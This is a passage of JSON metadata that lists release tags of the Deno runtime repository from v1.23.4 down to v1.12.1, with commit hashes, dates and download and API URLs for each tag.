job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/